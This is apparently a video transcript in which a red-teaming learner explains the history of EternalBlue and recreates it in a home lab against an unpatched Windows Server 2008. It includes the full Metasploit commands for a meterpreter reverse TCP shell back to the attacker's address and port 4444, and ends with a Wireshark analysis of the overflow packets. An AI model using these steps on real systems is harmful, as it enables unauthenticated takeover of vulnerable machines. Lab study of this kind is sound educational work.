EternalBlue is crazy. Now, it's only been a couple months since I've made it an effort to learn red teaming and attack simulations, but this exploit in particular from 2017 stands out as the king of all Windows exploits. Now, some history about EternalBlue. Originally, it was leaked by the Shadow Brokers, and they are a hacking group who managed to steal this exploit and actually a few others from the NSA. Now, Microsoft released a patch in March 2017 for EternalBlue, but machines that weren't actually patched were later targeted in ransomware attacks that utilized this exploit. For example, if you guys remember the WannaCry ransomware attack from 2017, that was a pretty vicious wormable ransomware variant that used EternalBlue and that affected over 300,000 computers worldwide by encrypting data and then demanding ransom payments by Bitcoin for the decryption key. Now, this had serious global impacts of up to $4 billion lost in damages, as well as vital infrastructure like hospitals being caught in the malware's path of destruction. Now, EternalBlue specifically targeted Windows machines running server message block version 1 over port 445. SMB v1 at the time was vulnerable to a buffer overflow, which could be triggered by sending malicious SMB packets to the target machine, enabling remote code execution without authentication, and ultimately enabling attackers to gain full control of the target computer. Now, in this video, I want to recreate EternalBlue in my home lab, and I also want to have a closer look at some of those packets that are actually involved in the attack. And to properly do this exploit, I got myself a fresh installation of Windows Server 2008 that I know for a fact does not have the EternalBlue security patch, and that I know for a fact is going to be vulnerable to the attack. I also added the Windows Server 2008 to my internal home network and ensured that my Kali machine can ping the Windows server and vice versa. And throughout all this, I'm going to be running Wireshark in the background so that we can later analyze the packets involved in the attack. So first up, to start this exploit, I'm going to type msf console, which is going to start the Metasploit service in Kali, which includes thousands of exploits that we can use, including EternalBlue. Now, once the Metasploit console is loaded, we can type use exploit windows SMB, and then the name of the exploit, EternalBlue. And then next up, we can set our rhost as the IP address of the target. So we're going to do set rhost and then the target's IP address. After that, we can set our payload as set payload Windows x64 meterpreter reverse TCP. After that, we can set the lhost as our Kali Linux IP address by doing set lhost 192.168.1.103. And then we can set the lport, set lport, we're going to do port 4444. After that, we can type exploit, hit enter, and sit back and see if the attack was successful. Okay, so good news, the attack was successful. Something to note here is that it first scans the machine to make sure that it's likely vulnerable to the exploit that you're using. And if we scroll down, we can see that it's initiated a session. What we can do from Interpreter is type shell, and that's going to spawn a command prompt session for us on the target machine. And if we type out who am I, it'll say that we are NT authority/system, which is essentially the highest local privilege you can have on a Windows machine. And that pretty much gives us the ability to do whatever we want on this target computer. Okay, so let's now go over to Wireshark and stop capturing and then look for those packets that were involved in the attack. So specifically in Wireshark, we're going to be looking for SMB packets. And right here, there are a series of packets over SMB that source from the Kali machine and that land on the destination Windows server. Now, the length of the packets specifically right here are significantly longer than other SMB packets. And if we look at the actual contents of these very large packets, we can see a bunch of structured data, which are actually the malicious file extended attribute lists used to exploit the vulnerability in server message block version 1. And these file extended attribute lists cause a buffer overflow in the Windows kernel by misleading the system about the size of the data that it's processing. And once the overflow is triggered, the attacker can hijack execution flow and inject shellcode. The shellcode for the attack runs with NT authority system privileges because SMB v1 runs in the kernel with those same elevated privileges. So by exploiting SMB in this case, the attacker is able to gain the highest level of access on the system and do whatever they want. Now, EternalBlue is pretty notable because it was an attack that targeted a major Windows service in SMB. Most Windows computers and servers by default have port 445 open, and even though SMB v1 was becoming an older service, that too was still available and running in 2017. Additionally, EternalBlue required no credentials, no phishing or any kind of social engineering, only access to the target's network. Now, personally, EternalBlue has made me question and think about if there are other exploits out there that maybe the public doesn't know about that could be even more dangerous and far-reaching than EternalBlue was. And if that's the case, could serious zero-day exploits getting in the wrong hands cause an even more damaging global cyber attack than what happened with WannaCry? Now, I would love to hear your guys' thoughts. I'm still learning every day about red teaming, and being able to give EternalBlue a try was something special, and I really had a lot of fun with it. And yeah, that's everything that I have for this video today. Thank you for watching, and I will see you guys in the next one.